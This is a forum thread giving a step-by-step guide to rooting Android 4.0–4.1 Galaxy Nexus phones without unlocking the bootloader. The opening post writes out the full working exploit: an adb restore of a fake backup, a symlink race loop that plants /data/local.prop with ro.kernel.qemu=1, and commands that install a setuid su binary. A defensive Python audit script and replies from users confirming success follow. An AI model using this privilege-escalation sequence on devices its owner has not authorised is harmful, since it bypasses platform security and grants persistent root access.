XDA Developers Android and Mobile Development Forum

[HOW-TO] [GSM & CDMA] How to root without unlocking bootloader (for ITL41D to JRO03O)

efrant (Senior Moderator - OP)
#1 (Last edited by efrant; 2nd January 2013 at 03:43 PM.)

As of Oct 10, 2012: Google has patched this vulnerability starting with JRO03U. That is to say, this works on versions of ICS and JB from ITL41D to JRO03O inclusive. It will not work for JRO03U or newer. (My previous guide found here only worked on Android versions 4.0.1 and 4.0.2, i.e., ITL41D/F and ICL53F.)

Once you have root, you can use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!

Disclaimer: I take no credit for this exploit or the implementation of it. All credit goes to Bin4ry and his team. I just isolated the parts required for the GNex, modified it slightly and eliminated the script.

So, it looks like Bin4ry (with the help of a couple of others) has managed to find a way to exploit a timing difference in the "adb restore" command. See source here. (Although this may be old news to some, I hadn't seen it before a few days ago.) This is more for informational purposes, as having a Nexus device, we are able to back up our data, unlock the bootloader and restore the backup, so this guide is not really that useful for most, but you still have those users who are scared to unlock their bootloader. It is useful, however, for those with a broken power button, as it allows them to unlock their bootloader without the power button.

How this works
The way this works is as follows: the "adb restore" command needs to be able to write to /data to restore a backup. Because of this, we can find a way to write something to /data while this is being done. Now, Android parses a file called /data/local.prop on boot. If the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. So, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.

So what does this all mean:
  • You can now root any version of ICS and JB released to-date without having to unlock your bootloader (and without losing your data).
  • Moreover, you should now be able to root your device even if your hardware buttons are not working.
  • Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.

Notes:
1) Please read the entire post before attempting this.
2) This does not wipe any of your data, but I take no responsibility if something happens and you lose your data. Maybe consider doing a backup as per this thread before attempting this.
3) This assumes that you have USB Debugging enabled on your device (Settings > Developer Options > Enable USB Debugging) and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.
4) This obviously needs to be done over ADB, as you cannot run adb in a terminal emulator on-device. If you do not have ADB, I've attached it in the zip (Windows and Linux versions). Unzip all files.

Step-by-step:
1) Download the attached files to your computer and unzip them;
2) Open a command prompt in that same directory;
3) Copy the root files to your device:

adb push su /data/local/tmp/su
adb push Superuser.apk /data/local/tmp/Superuser.apk
4) Restore the fake "backup": adb restore fakebackup.ab Note: do not click restore on your device. Just enter the command into the command prompt on your PC and press the enter key.
5) Run the "exploit": adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done" Note: when you enter this command, you should see your adb window flooded with errors -- this is what is supposed to happen.
6) Now that the "exploit" is running, click restore on your device.
7) Once it finishes, reboot your device: adb reboot Note: Do not try and use your device when it reboots. Running this exploit will reboot your device into emulator mode, so it will be laggy and the screen will flicker -- this is normal.
8) Once it is rebooted, open a shell: adb shell

Note: Once you do step 8, you should have a root shell, i.e., your prompt should be #, not $. If not, it did not work. Start again from step 4. (It may take a few tries for it to work. Thanks segv11.)

Now we can copy su and Superuser.apk to the correct spots to give us root.

9) Mount the system partition as r/w: mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system
10) Copy su to /system: cat /data/local/tmp/su > /system/bin/su
11) Change permissions on su: chmod 06755 /system/bin/su
12) Symlink su to /xbin/su: ln -s /system/bin/su /system/xbin/su
13) Copy Superuser.apk to /system: cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk
14) Change permissions on Superuser.apk: chmod 0644 /system/app/Superuser.apk
15) Delete the file that the exploit created: rm /data/local.prop
16) Exit the ADB shell: exit (May have to type exit twice to get back to your command prompt.)
17) Type the following (not sure if this is needed for the GNex, but it shouldn't matter): adb shell "sync; sync; sync;"
18) Reboot: adb reboot
19) Done. You now should have root without having to unlock your bootloader. If you want to unlock now, you can without wiping anything. See segv11's app linked at the beginning of this post.

Note: If you still do not have root access after doing these steps, redo them and add this step between 10 and 11:

10b) Change the owner of su: chown 0.0 /system/bin/su (Thanks maxrfon.)
Attached file: Root-without-unlock.zip (1.52 MB)
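As a defender-side check added here (not part of efrant's post or Bin4ry's package): a small Python audit that classifies a device's build ID against the ITL41D..JRO03O range the post gives, and flags a leftover /data/local.prop that still carries ro.kernel.qemu=1, the artefact step 15 deletes. It assumes the documented Android build-ID layout (release letter, branch letter, quarter letter, day-of-quarter, revision letter) and treats the date-code comparison as a heuristic; the build IDs and the local.prop sample are constructed inputs.

```python
import re
from typing import List, Optional, Tuple
# Range the post gives as affected: ITL41D up to and including JRO03O.
FIRST_AFFECTED, LAST_AFFECTED = "ITL41D", "JRO03O"
# Assumed Android build-ID layout (documented scheme): release letter, branch
# letter, quarter letter, two-digit day within the quarter, revision letter.
BUILD_ID_RE = re.compile(r"^[A-Z][A-Z]([A-Z])(\d{2})([A-Z])$")

def build_id_key(build_id: str) -> Optional[Tuple[str, int, str]]:
    """Sortable (quarter, day, revision) date code of a build ID, or None."""
    m = BUILD_ID_RE.match(build_id.strip().upper())
    return (m.group(1), int(m.group(2)), m.group(3)) if m else None

def is_in_affected_range(build_id: str) -> Optional[bool]:
    """True inside ITL41D..JRO03O, False outside, None if unparseable.
    Heuristic: compares date codes only, not the actual patch state."""
    key = build_id_key(build_id)
    if key is None:
        return None
    return build_id_key(FIRST_AFFECTED) <= key <= build_id_key(LAST_AFFECTED)

def has_qemu_root_flag(prop_text: str) -> bool:
    """True if a property file sets ro.kernel.qemu=1, the line the post says
    makes the device boot in emulator mode with a root shell."""
    for line in prop_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        if key.strip() == "ro.kernel.qemu" and value.strip() == "1":
            return True
    return False

def audit(build_id: str, local_prop_text: str) -> List[str]:
    """Findings an admin wants: exposure of the build, and leftover artefact."""
    findings = []
    affected = is_in_affected_range(build_id)
    if affected is None:
        findings.append(f"build ID {build_id!r} not in the expected format")
    elif affected:
        findings.append(f"build {build_id} lies in ITL41D..JRO03O (adb restore race unpatched)")
    if has_qemu_root_flag(local_prop_text):
        findings.append("ro.kernel.qemu=1 in local.prop: root shell at boot; delete it (step 15)")
    return findings

# Constructed sample of a /data/local.prop left behind when step 15 is skipped.
SAMPLE_LOCAL_PROP = "# constructed sample\nro.kernel.qemu=1\n"
if __name__ == "__main__":
    print("\n".join(audit("JRO03O", SAMPLE_LOCAL_PROP)))
```

On a real device the two inputs would come from `adb shell getprop ro.build.id` and `adb shell cat /data/local.prop`.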
 
Lorenzo_9 (Junior Member)
#2
I've done all. It installs the Superuser app but the phone is not really rooted and apps that require it don't work.
 
efrant (Senior Moderator - OP)
#3
Quote:
Originally Posted by Lorenzo_9
I've done all. It installs the Superuser app but the phone is not really rooted and apps that require it don't work.
Did you try opening the Superuser app?

What happens when you open an app that requires root? Do you get the request for su access?
 
Lorenzo_9 (Junior Member)
#4
You can open the app but with apps that require root there are no requests and they don't... Even using root checker you see that you're not rooted.
 
efrant (Senior Moderator - OP)
#5
Quote:
Originally Posted by Lorenzo_9
You can open the app but with apps that require root there are no requests and they don't... Even using root checker you see that you're not rooted.
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.
 
Lorenzo_9 (Junior Member)
#6
Quote:
Originally Posted by efrant
Re-run the entire procedure again (including pushing the su and Superuser.apk files). When I had done it, I used the latest version of su and Superuser.apk, but when I uploaded the files in the attachment in post #1, I used the files that Bin4ry had in his package, which I assume are older. Regardless, re-download the attachment in the first post and try it again.
Ok, I'll do it and then I'll report back to you what happens. So now have you updated su and superuser.apk?
 
efrant (Senior Moderator - OP)
#7
Quote:
Originally Posted by Lorenzo_9
Ok, I'll do it and then I'll report back to you what happens. So now have you updated su and superuser.apk?
Yes, I put the latest versions in the zip in the first post.
 
serty4011 (Junior Member)
#8
I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.

Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.
 
efrant (Senior Moderator - OP)
#9
Quote:
Originally Posted by serty4011
I can confirm that this works, and also that step 10b was not needed for me. This is the first time I have not used a toolkit so if I can do it, anyone can.

Running a Verizon Galaxy Nexus, this allowed me to update to the leaked Jelly Bean OTA with a locked bootloader. I first flashed stock 4.0.4 and locked the bootloader. I then used the exploit to gain root access, allowing me to apply IMM76Q and JRO03O OTA updates via stock recovery. (Rebooting between updates.) Thank you for creating a guide that this newb could easily understand and follow.
Thanks for confirming that step was not needed.
 
kong (Senior Member)
#10
Thanks!

Bookmarked for future reference

Tags
bootloader, locked, root, unlock